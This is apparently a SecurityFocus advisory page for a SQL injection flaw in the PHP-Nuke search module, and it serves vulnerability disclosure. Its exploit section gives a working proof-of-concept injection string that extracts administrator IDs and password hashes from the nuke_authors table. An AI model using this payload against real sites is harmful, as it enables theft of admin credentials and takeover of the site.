info
discussion
exploit
solution
references
PHPNuke Index.PHP Search Module SQL Injection Vulnerability
No exploit is required.
The following proof of concept is available:
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Privacy Statement
Copyright 2010, SecurityFocus
